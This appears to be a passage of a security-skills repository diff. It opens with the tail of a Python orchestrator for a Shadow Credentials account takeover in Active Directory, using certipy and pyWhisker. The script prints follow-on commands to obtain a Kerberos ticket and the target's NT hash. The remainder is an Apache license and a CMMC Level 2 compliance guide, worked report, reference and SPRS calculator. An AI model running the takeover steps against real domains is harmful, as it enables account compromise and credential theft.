        sys.exit("[!] pyWhisker add failed.")
    pfx_pass = None
    m = re.search(r"[Pp]assword(?: for the PFX)?:\s*(\S+)", out)
    if m:
        pfx_pass = m.group(1)
    print(f"\n[+] Key Credential added. PFX: {base}.pfx  PFX-pass: {pfx_pass}")
    print("[+] Next, request a TGT with PKINITtools:")
    print(f"    python3 gettgtpkinit.py -cert-pfx {base}.pfx -pfx-pass {pfx_pass} "
          f"{args.domain}/{args.target.rstrip('$')} {base}.ccache")
    print("    export KRB5CCNAME=%s.ccache" % base)
    print(f"    python3 getnthash.py -key <AS-REP-KEY> {args.domain}/{args.target.rstrip('$')}")
    print("[!] Remember to clean up the injected Key Credential when done:")
    print(f"    python3 {args.pywhisker} -d {args.domain} -u {args.user} "
          f"--target {args.target} --action clear")
 def main():
    ap = argparse.ArgumentParser(description="Shadow Credentials takeover orchestrator.")
    sub = ap.add_subparsers(dest="mode", required=True)
    c = sub.add_parser("certipy", help="Use certipy shadow auto (end to end)")
    c.add_argument("-u", "--user", required=True, help="attacker@domain")
    c.add_argument("-p", "--password")
    c.add_argument("--hashes")
    c.add_argument("-k", "--kerberos", action="store_true")
    c.add_argument("--dc-ip", required=True, dest="dc_ip")
    c.add_argument("--target", required=True, help="victim or WS01$")
    c.add_argument("--ns")
    w = sub.add_parser("pywhisker", help="Use pyWhisker add (manual PKINIT after)")
    w.add_argument("-d", "--domain", required=True)
    w.add_argument("-u", "--user", required=True)
    w.add_argument("-p", "--password")
    w.add_argument("-k", "--kerberos", action="store_true")
    w.add_argument("--dc-ip", dest="dc_ip")
    w.add_argument("--target", required=True)
    w.add_argument("--pywhisker", required=True, help="Path to pywhisker.py")
    args = ap.parse_args()
    if args.mode == "certipy":
        certipy_flow(args)
    else:
        pywhisker_flow(args)
 if __name__ == "__main__":
    main()
@@ -0,0 +1,201 @@
                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
   1. Definitions.
      "License" shall mean the terms and conditions for use, reproduction,
      and distribution as defined by Sections 1 through 9 of this document.
      "Licensor" shall mean the copyright owner or entity authorized by
      the copyright owner that is granting the License.
      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -0,0 +1,142 @@
 ---
 name: achieving-cmmc-level-2-compliance
 description: >-
  Prepare a defense-contractor environment for CMMC Level 2 certification: scope CUI
  and FCI, implement the 110 NIST SP 800-171 Rev 2 security requirements across 14
  families, compute the SPRS score with the DoD Assessment Methodology, manage a
  compliant POA&M, and ready the organization for a C3PAO assessment. Use when an
  organization handles Controlled Unclassified Information (CUI) under a DoD contract,
  when a contract carries DFARS clause 252.204-7012/7019/7020/7021, when preparing for
  or responding to a CMMC assessment, when computing or improving an SPRS score, when
  building a System Security Plan or POA&M for 800-171, or when scoping which systems
  are in the CUI boundary. Keywords: CMMC, CMMC Level 2, NIST 800-171, SP 800-171 Rev 2,
  CUI, FCI, SPRS, DFARS 7012, C3PAO, POA&M, System Security Plan, DoD Assessment
  Methodology, 110 controls, defense industrial base, DIB, FedRAMP equivalency.
 domain: cybersecurity
 subdomain: compliance-governance
 tags:
 - cmmc
 - nist-800-171
 - cui
 - sprs
 - dfars
 - c3pao
 - poam
 - compliance
 - governance
 - defense-industrial-base
 version: "1.0"
 author: andrewibrah
 license: Apache-2.0
 nist_csf:
 - GV.OC-03
 - GV.SC-01
 - ID.AM-08
 - ID.RA-05
 - PR.AA-01
 - PR.DS-01
 mitre_attack:
 - T1078
 - T1190
 - T1041
 - T1048
 - T1567
 ---
 # Achieving CMMC Level 2 Compliance
 ## When to Use
 - When an organization in the **Defense Industrial Base (DIB)** stores, processes, or transmits **Controlled Unclassified Information (CUI)** under a DoD contract.
 - When a contract includes **DFARS 252.204-7012** (safeguarding/incident reporting), **-7019/-7020** (NIST 800-171 self-assessment + SPRS), or the new **-7021** (CMMC requirement).
 - When preparing for a **C3PAO** third-party assessment or a DoD-led assessment.
 - When you must **compute, post, or improve an SPRS score** based on the NIST SP 800-171 DoD Assessment Methodology.
 - When authoring or remediating a **System Security Plan (SSP)** and **POA&M** for the 110 requirements.
 - When **scoping** which assets fall inside the CUI/FCI boundary (CUI assets, security-protection assets, contractor risk-managed assets, out-of-scope).
 ## Prerequisites
 - Knowledge of **which contracts carry CUI** and the CUI categories involved (check the contract and the DoD CUI Registry).
 - An asset inventory and network diagram so you can define the **CMMC assessment scope** before assessing controls.
 - The **NIST SP 800-171 Rev 2** requirements and the **DoD Assessment Methodology** scoring weights.
 - A documented **SSP** (its absence is itself a failed requirement — 3.12.4).
 - Identification of any **External Service Providers (ESPs)** / cloud services touching CUI, and whether they meet **FedRAMP Moderate (or equivalency)**.
 ## Workflow
 ### 1. Determine applicability and CUI categories
 Confirm the contract requires CMMC Level 2 (CUI present, not just FCI). FCI-only contracts are **Level 1** (the 15 FAR 52.204-21 requirements). Identify CUI categories from the contract and the DoD CUI Registry.
 ### 2. Scope the environment
 Classify every asset into one of the CMMC scoping categories:
 - **CUI Assets** — process/store/transmit CUI (in scope, assessed against all applicable controls).
 - **Security Protection Assets** — provide security to the CUI environment (in scope).
 - **Contractor Risk Managed Assets** — could but are not intended to handle CUI; managed by policy.
 - **Specialized Assets** (IoT/OT, GFE, test equipment) — documented, limited assessment.
 - **Out-of-Scope** — physically/logically isolated from CUI.
 Minimize scope deliberately — a smaller, well-segmented CUI enclave is far cheaper to certify than a flat network.
 ### 3. Implement the 110 requirements (NIST SP 800-171 Rev 2)
 Work the **14 families** (3.1–3.14). For each requirement, implement, then write the **how** in the SSP. High-leverage early wins: MFA (3.5.3), FIPS-validated cryptography (3.13.11), audit logging (3.3.x), access control + least privilege (3.1.x), and incident response (3.6.x).
 ### 4. Score with the DoD Assessment Methodology (SPRS)
 Start at **110** and subtract the weighted value (**1, 3, or 5 points**) of each **unmet** requirement; partial credit applies to a small number of controls (e.g., MFA, FIPS crypto). The result is the **SPRS score** (maximum 110; the methodology floor is −203). Post the score, the SSP date, and the assessment scope to **SPRS** (or eMASS for higher assessments).
 ### 5. Build a compliant POA&M
 Document every unmet requirement with owner, remediation, and milestone. **Constraints under the CMMC rule:** a **Conditional** status requires a score of at least **80%** (≥ 88 of 110), only **POA&M-eligible** requirements may be deferred (the highest-weighted security requirements must be fully met — verify eligibility against 32 CFR Part 170), and all POA&M items must be **closed within 180 days** to convert Conditional → **Final**.
 ### 6. Assess (self or C3PAO)
 - **Level 1** and a subset of Level 2 = annual **self-assessment** with an affirmation in SPRS.
 - **Level 2 (most CUI contracts)** = triennial **C3PAO** certification assessment.
 - **Level 3** = DoD (DIBCAC) assessment on top of Level 2, adding SP 800-172 enhanced requirements.
 Assessors evaluate each objective as **MET / NOT MET / N/A** with evidence (examine/interview/test). A senior official files the **annual affirmation** of continued compliance.
 ### 7. Maintain certification
 Certification is valid **three years** with **annual affirmations**. Maintain the SSP, re-score on change, keep evidence current, and feed significant changes back into the assessment.
 ## Key Concepts
 | Concept | Definition |
 |---|---|
 | FCI | Federal Contract Information — Level 1 protects it (FAR 52.204-21). |
 | CUI | Controlled Unclassified Information — Level 2 protects it (NIST 800-171). |
 | 110 requirements | The SP 800-171 Rev 2 security requirements across 14 families. |
 | SPRS | Supplier Performance Risk System — where the 800-171 score is posted. |
 | DoD Assessment Methodology | The 1/3/5-point weighting used to compute the score from 110. |
 | C3PAO | CMMC Third-Party Assessment Organization — performs Level 2 certification. |
 | POA&M | Plan of Action & Milestones — limited, must close in 180 days for Final status. |
 | Conditional vs Final | Conditional = open POA&M (score ≥ 80%); Final = all controls met. |
 | ESP | External Service Provider — must meet FedRAMP Moderate / equivalency for CUI. |
 | Scoping categories | CUI / Security Protection / Contractor Risk Managed / Specialized / Out-of-Scope. |
 ## Tools & Systems
 - **NIST SP 800-171 Rev 2** — the 110 requirements (and 800-171A for assessment objectives).
 - **DoD NIST SP 800-171 Assessment Methodology** — the scoring weights.
 - **32 CFR Part 170** (CMMC Program rule) and **48 CFR / DFARS 252.204-7021** (acquisition rule).
 - **SPRS** — score posting; **SAM.gov** for registration.
 - **SP 800-172 / 800-172A** — enhanced requirements for Level 3.
 - **GRC / compliance tooling** — to manage the SSP, POA&M, and evidence (e.g., Xacta, RegScale, FutureFeed-style trackers).
 ## Common Scenarios
 - **Prime flows CUI to a sub.** The sub needs its own Level 2 scope, SSP, SPRS score, and (most likely) C3PAO certification.
 - **Score is below 88.** Prioritize the highest-weighted unmet requirements (5-point, then 3-point) to clear the conditional threshold and shrink the POA&M.
 - **Cloud holds CUI.** Confirm the service is FedRAMP Moderate authorized or meets equivalency; document the responsibility split.
 - **Flat network.** Re-scope into a segmented CUI enclave to cut the assessment surface before spending on controls.
 - **Annual affirmation due.** A senior official affirms continued compliance in SPRS; let it lapse and you risk contract eligibility.
 ## Output Format
 Produce a **CMMC Level 2 Readiness Report** using `assets/template.md`, containing:
 1. **Applicability & CUI categories** — why Level 2 applies.
 2. **Scope** — assets by scoping category and the CUI boundary diagram reference.
 3. **Control status by family** — met / not met / N/A across the 14 families.
 4. **SPRS score** — computed score, deductions, and the gap to 110 and to the 88 threshold.
 5. **POA&M** — unmet requirements, eligibility check, owners, 180-day milestones.
 6. **Assessment path** — self vs C3PAO, target date, affirmation owner.
 7. **Remediation roadmap** — sequenced by point value and effort.
 Use `scripts/process.py` to compute the SPRS score from a control-status JSON, flag POA&M-eligibility concerns, and report the gap to the conditional-certification threshold.
@@ -0,0 +1,63 @@
 # CMMC Level 2 Readiness Report — Worked Example
 > Filled example for a small DIB manufacturer handling CUI on a segmented enclave.
 > Replace bracketed content for your own organization.
 ## 1. Applicability & CUI Categories
 - **Contract drivers:** Prime subcontract with DFARS **252.204-7012** and **-7021**; CUI present → **CMMC Level 2** required.
 - **CUI categories (from contract + DoD CUI Registry):** Controlled Technical Information (CTI), Export Controlled (EAR).
 - **Target assessment path:** Triennial **C3PAO** certification (Phase 2 applies from Nov 10, 2026).
 ## 2. Scope (CMMC Level 2 Scoping Guide)
 | Category | Examples in this environment |
 |---|---|
 | CUI Assets | Engineering workstations, CUI file share, the segmented "Enclave-1" VLAN |
 | Security Protection Assets | EDR console, SIEM, firewall, IdP/MFA, jump host |
 | Contractor Risk Managed | General corporate laptops (policy-blocked from CUI) |
 | Specialized Assets | CNC machine controllers (documented, isolated) |
 | Out-of-Scope | Guest Wi-Fi, marketing SaaS |
 **Boundary note:** CUI is confined to Enclave-1 behind segmentation and MFA. Deliberately minimized to shrink the assessment surface. See network diagram `CUI-boundary-v3`.
 ## 3. Control Status by Family (NIST SP 800-171 Rev 2)
 *(summary; full per-requirement status lives in the SSP)*
 | Family | Met | Partial | Not Met | N/A |
 |---|---|---|---|---|
 | 3.1 Access Control | 22 | 0 | 0 | 0 |
 | 3.3 Audit & Accountability | 8 | 0 | 1 | 0 |
 | 3.5 Identification & Auth | 10 | 1 | 0 | 0 |
 | 3.8 Media Protection | 8 | 0 | 1 | 0 |
 | 3.13 System & Comms Protection | 15 | 0 | 1 | 0 |
 | 3.14 System & Info Integrity | 6 | 0 | 1 | 0 |
 | *(others)* | all met | — | — | — |
 ## 4. SPRS Score
 *(computed by `scripts/process.py` from the control-status JSON)*
 - **Score: 97 / 110** (started at 110; deducted 13).
 - **Gap to perfect:** 13 points across 4 not-met + 1 partial requirement.
 - **Conditional threshold (≥ 88):** **MET** (margin 9) — eligible for Conditional status *if* the remaining items are POA&M-eligible.
 - **Posted to SPRS:** score, SSP date, and assessment scope.
 ## 5. POA&M (eligibility-checked)
 | ID | Requirement | Points | Eligibility | Remediation | Owner | Milestone (≤180d) |
 |---|---|---|---|---|---|---|
 | 3.3.1 | Audit log generation/coverage | 5 | **Verify** — high weight; confirm against 32 CFR 170 | Enable full audit policy + ship to SIEM | SecOps | 2026-07-30 |
 | 3.13.11 | FIPS-validated cryptography | 3 | **Verify** eligibility | Replace non-validated module with FIPS 140-validated | Infra | 2026-08-15 |
 | 3.5.3 | MFA (partial) | 3 | Partial-credit control | Extend MFA to remaining admin paths | IAM | 2026-07-20 |
 | 3.8.9 | Backup CUI protection | 1 | Eligible | Encrypt + access-control backup store | Infra | 2026-08-31 |
 | 3.14.1 | Flaw remediation | 1 | Eligible | Formalize patch SLA + tracking | IT | 2026-08-31 |
 > The two 3-point and one 5-point items must clear eligibility review; the highest-weighted security requirements generally cannot remain on a POA&M. All items close within **180 days** to convert Conditional → **Final**.
 ## 6. Assessment Path
 - **Type:** C3PAO certification assessment.
 - **Target window:** Q4 2026, after POA&M closure of the high-weight items.
 - **Affirmation owner:** [senior official] files the annual affirmation in SPRS.
 ## 7. Remediation Roadmap (sequenced by point value, then effort)
 1. **3.3.1 audit logging (5 pts)** — biggest score lever and likely POA&M-ineligible → do first.
 2. **3.13.11 FIPS crypto (3 pts)** and **3.5.3 MFA gap (3 pts)** — close to remove eligibility risk.
 3. **3.8.9, 3.14.1 (1 pt each)** — low-effort cleanups before the C3PAO date.
 4. Re-run the SPRS calculator after each closure; goal is **110** before assessment.
@@ -0,0 +1,84 @@
 # CMMC Level 2 — Standards & Reference
 ## Governing rules
 | Rule | Citation | Status / effective date |
 |---|---|---|
 | CMMC Program rule | 32 CFR Part 170 | Effective **December 16, 2024** |
 | CMMC acquisition rule (DFARS) | 48 CFR; DFARS clause **252.204-7021** (and 204.7503) | Published Sept 10, 2025; effective **November 10, 2025** |
 | Safeguarding CUI / incident reporting | DFARS **252.204-7012** | In effect |
 | NIST 800-171 self-assessment + SPRS posting | DFARS **252.204-7019 / -7020** | In effect |
 > Always confirm current status at the source — acquisition rules and phase dates have moved before. Authoritative: https://dodcio.defense.gov/CMMC/ and the eCFR for 32 CFR Part 170.
 ## Phased rollout (per the acquisition rule)
 | Phase | Begins | What applies |
 |---|---|---|
 | Phase 1 | **Nov 10, 2025** | Level 1 and some Level 2 **self-assessment** required in solicitations |
 | Phase 2 | **Nov 10, 2026** | Level 2 **C3PAO certification** required for applicable contracts |
 | Phase 3 | **Nov 10, 2027** | Level 2 C3PAO + Level 3 **DIBCAC** assessment phased in |
 | Phase 4 | **Nov 10, 2028** | Full implementation across applicable DoD contracts |
 ## The three CMMC levels
 | Level | Protects | Requirements | Assessment |
 |---|---|---|---|
 | Level 1 | FCI | 15 requirements (FAR 52.204-21) | Annual self-assessment + affirmation |
 | Level 2 | CUI | **110 requirements (NIST SP 800-171 Rev 2)** | Self **or** triennial C3PAO certification |
 | Level 3 | CUI (high priority) | 110 + selected **SP 800-172** enhanced | DoD (DIBCAC) assessment |
 Certification validity: **3 years**, with **annual affirmation** by a senior official in SPRS.
 ## NIST SP 800-171 Rev 2 — the 14 families (110 requirements)
 | § | Family | # reqs |
 |---|---|---|
 | 3.1 | Access Control | 22 |
 | 3.2 | Awareness and Training | 3 |
 | 3.3 | Audit and Accountability | 9 |
 | 3.4 | Configuration Management | 9 |
 | 3.5 | Identification and Authentication | 11 |
 | 3.6 | Incident Response | 3 |
 | 3.7 | Maintenance | 6 |
 | 3.8 | Media Protection | 9 |
 | 3.9 | Personnel Security | 2 |
 | 3.10 | Physical Protection | 6 |
 | 3.11 | Risk Assessment | 3 |
 | 3.12 | Security Assessment | 4 |
 | 3.13 | System and Communications Protection | 16 |
 | 3.14 | System and Information Integrity | 7 |
 | | **Total** | **110** |
 (Assessment objectives for each requirement are in **NIST SP 800-171A**.)
 ## DoD Assessment Methodology — SPRS scoring
 - Start at **110**. Subtract the weighted value of each **NOT MET** requirement.
 - Weights: **1, 3, or 5 points**. The most security-significant requirements are weighted 3 or 5.
 - **Partial credit** applies to a small number of requirements (notably MFA at 3.5.3 and FIPS-validated cryptography at 3.13.11) where partial implementation reduces the deduction.
 - Maximum score **110**; the methodology floor is **−203** (more is deducted than the 110 starting points because of the weighting).
 - The complete per-requirement point assignment is published in the **DoD NIST SP 800-171 Assessment Methodology** — use that document for the authoritative weight of each control rather than estimating.
 ## POA&M rules under the CMMC rule (32 CFR Part 170)
 - A **Conditional** Level 2 status is allowed only if the assessment score is **at least 80% (≥ 88 of 110)**.
 - Only **POA&M-eligible** requirements may be deferred. The highest-weighted security requirements generally **must be fully met** and **cannot** sit on a POA&M — verify each item's eligibility against the rule.
 - All POA&M items must be **closed within 180 days**; a closeout assessment then converts **Conditional → Final**.
 ## Scoping categories (CMMC Level 2 Scoping Guide)
 | Category | Treatment |
 |---|---|
 | CUI Assets | Process/store/transmit CUI — assessed against applicable requirements. |
 | Security Protection Assets | Provide security to the CUI environment — in scope. |
 | Contractor Risk Managed Assets | Capable of handling CUI but not intended to — managed by policy/config. |
 | Specialized Assets | IoT/OT, GFE, test equipment — documented, limited assessment. |
 | Out-of-Scope Assets | Isolated from CUI — not assessed. |
 ## External Service Providers / cloud
 - Cloud services that store/process/transmit CUI must be **FedRAMP Moderate authorized or meet FedRAMP Moderate equivalency**.
 - Document the customer/provider responsibility split (CRM) and inherited controls in the SSP.
 ## NIST CSF 2.0 alignment
 | CSF 2.0 ID | Relevance |
 |---|---|
 | GV.OC-03 | Legal/regulatory (DFARS/CMMC) requirements understood. |
 | GV.SC-01 | Supply-chain risk management — flowdown to subs / ESPs. |
 | ID.AM-08 | Assets managed across the lifecycle (scoping). |
 | ID.RA-05 | Risk informs prioritization of unmet requirements. |
 | PR.AA-01 | Identity and access (3.1 / 3.5 families). |
 | PR.DS-01 | Data-at-rest protection (FIPS crypto, media protection). |
@@ -0,0 +1,198 @@
 #!/usr/bin/env python3
 """
 CMMC Level 2 / NIST SP 800-171 Rev 2 SPRS score calculator.
 Implements the DoD Assessment Methodology arithmetic: start at 110 and subtract
 the weighted value (1, 3, or 5) of each NOT MET requirement, with partial credit
 for the small set of requirements that allow it. Reports the SPRS score, the gap
 to a perfect 110 and to the 88-point (80%) conditional-certification threshold,
 and flags higher-weighted unmet requirements whose POA&M eligibility must be
 verified against 32 CFR Part 170.
 NOTE: per-requirement point weights are defined by the DoD NIST SP 800-171
 Assessment Methodology. Supply each requirement's official weight in the input
 (this tool does not invent weights). Use status 'partial' with 'partial_deduction'
 only for requirements the methodology allows partial credit on (e.g., 3.5.3 MFA,
 3.13.11 FIPS crypto).
 Input JSON shape:
 {
  "org": {"name": "Acme Defense LLC", "scope": "CUI enclave"},
  "requirements": [
    {"id": "3.1.1",  "family": "3.1", "status": "met",      "weight": 5},
    {"id": "3.5.3",  "family": "3.5", "status": "partial",  "weight": 5, "partial_deduction": 3},
    {"id": "3.3.1",  "family": "3.3", "status": "not_met",  "weight": 5},
    {"id": "3.8.9",  "family": "3.8", "status": "not_met",  "weight": 1},
    {"id": "3.2.1",  "family": "3.2", "status": "na",       "weight": 1}
  ]
 }
 status: met | not_met | partial | na
 Usage:
  python process.py --input controls.json [--output readiness.md]
  python process.py --input controls.json --require-conditional   # exit 1 if score < 88
 """
 import argparse
 import json
 import sys
 START_SCORE = 110
 CONDITIONAL_THRESHOLD = 88   # 80% of 110
 VALID_STATUS = {"met", "not_met", "partial", "na"}
 VALID_WEIGHTS = {1, 3, 5}
 def compute(data):
    reqs = data.get("requirements", [])
    if not reqs:
        raise ValueError("requirements list is required")
    deductions = 0
    counts = {"met": 0, "not_met": 0, "partial": 0, "na": 0}
    poam_flags = []   # higher-weight unmet -> verify POA&M eligibility
    by_family = {}    # family -> {met,not_met,partial,na}
    detail = []
    for r in reqs:
        rid = r.get("id", "?")
        status = r.get("status")
        weight = r.get("weight")
        if status not in VALID_STATUS:
            raise ValueError(f"{rid}: status '{status}' invalid (met|not_met|partial|na)")
        if status in ("not_met", "partial", "met") and weight not in VALID_WEIGHTS:
            raise ValueError(f"{rid}: weight '{weight}' invalid (must be 1, 3, or 5)")
        fam = r.get("family", rid.rsplit(".", 1)[0])
        fam_rec = by_family.setdefault(fam, {"met": 0, "not_met": 0, "partial": 0, "na": 0})
        fam_rec[status] += 1
        counts[status] += 1
        ded = 0
        if status == "not_met":
            ded = weight
            if weight > 1:
                poam_flags.append((rid, weight))
        elif status == "partial":
            ded = r.get("partial_deduction")
            if ded is None:
                raise ValueError(f"{rid}: status 'partial' requires 'partial_deduction'")
            if ded < 0 or ded > weight:
                raise ValueError(f"{rid}: partial_deduction {ded} out of range (0..{weight})")
            if ded > 1:
                poam_flags.append((rid, ded))
        deductions += ded
        detail.append((rid, fam, status, weight, ded))
    score = START_SCORE - deductions
    return {
        "score": score,
        "deductions": deductions,
        "counts": counts,
        "by_family": by_family,
        "poam_flags": poam_flags,
        "detail": detail,
    }
 def render(data, res):
    org = data.get("org", {})
    lines = []
    lines.append(f"# CMMC Level 2 Readiness - {org.get('name','Organization')}")
    lines.append("")
    if org.get("scope"):
        lines.append(f"- **Scope:** {org['scope']}")
    lines.append("")
    score = res["score"]
    lines.append("## SPRS Score (DoD Assessment Methodology)")
    lines.append("")
    lines.append(f"- **Score:** **{score}** / 110  (started at 110, deducted {res['deductions']})")
    lines.append(f"- **Gap to perfect (110):** {110 - score}")
    if score >= CONDITIONAL_THRESHOLD:
        lines.append(f"- **Conditional threshold (>= {CONDITIONAL_THRESHOLD}):** MET "
                     f"(margin {score - CONDITIONAL_THRESHOLD}) - eligible for Conditional status "
                     "if remaining items are POA&M-eligible.")
    else:
        lines.append(f"- **Conditional threshold (>= {CONDITIONAL_THRESHOLD}):** NOT MET "
                     f"(short by {CONDITIONAL_THRESHOLD - score}) - not eligible for Conditional "
                     "certification until the score reaches 88.")
    c = res["counts"]
    lines.append(f"- **Status tally:** met {c['met']}, partial {c['partial']}, "
                 f"not met {c['not_met']}, N/A {c['na']}")
    lines.append("")
    # by family
    lines.append("## Status by family")
    lines.append("")
    lines.append("| Family | Met | Partial | Not Met | N/A |")
    lines.append("|---|---|---|---|---|")
    for fam in sorted(res["by_family"]):
        f = res["by_family"][fam]
        lines.append(f"| {fam} | {f['met']} | {f['partial']} | {f['not_met']} | {f['na']} |")
    lines.append("")
    # POA&M eligibility flags
    lines.append("## POA&M eligibility check")
    lines.append("")
    if not res["poam_flags"]:
        lines.append("No unmet requirement carries more than 1 point of deduction. "
                     "Remaining gaps are most likely POA&M-eligible (still verify against 32 CFR Part 170).")
    else:
        lines.append("The following unmet/partial requirements carry **> 1 point**. The highest-weighted "
                     "security requirements generally **cannot** sit on a POA&M - verify each against "
                     "32 CFR Part 170 before relying on Conditional status:")
        lines.append("")
        lines.append("| Requirement | Points lost |")
        lines.append("|---|---|")
        for rid, w in sorted(res["poam_flags"], key=lambda x: -x[1]):
            lines.append(f"| {rid} | {w} |")
    lines.append("")
    lines.append("> All POA&M items must be closed within **180 days** to convert Conditional -> Final.")
    return "\n".join(lines)
 def main():
    ap = argparse.ArgumentParser(description="CMMC L2 / NIST 800-171 SPRS score calculator")
    ap.add_argument("--input", "-i", required=True, help="Path to control-status JSON")
    ap.add_argument("--output", "-o", help="Write Markdown readiness report to this path")
    ap.add_argument("--require-conditional", action="store_true",
                    help="Exit non-zero if SPRS score < 88 (conditional threshold)")
    args = ap.parse_args()
    try:
        with open(args.input) as f:
            data = json.load(f)
    except (OSError, json.JSONDecodeError) as e:
        print(f"ERROR: could not read input JSON: {e}", file=sys.stderr)
        return 2
    try:
        res = compute(data)
        md = render(data, res)
    except ValueError as e:
        print(f"ERROR: {e}", file=sys.stderr)
        return 2
    if args.output:
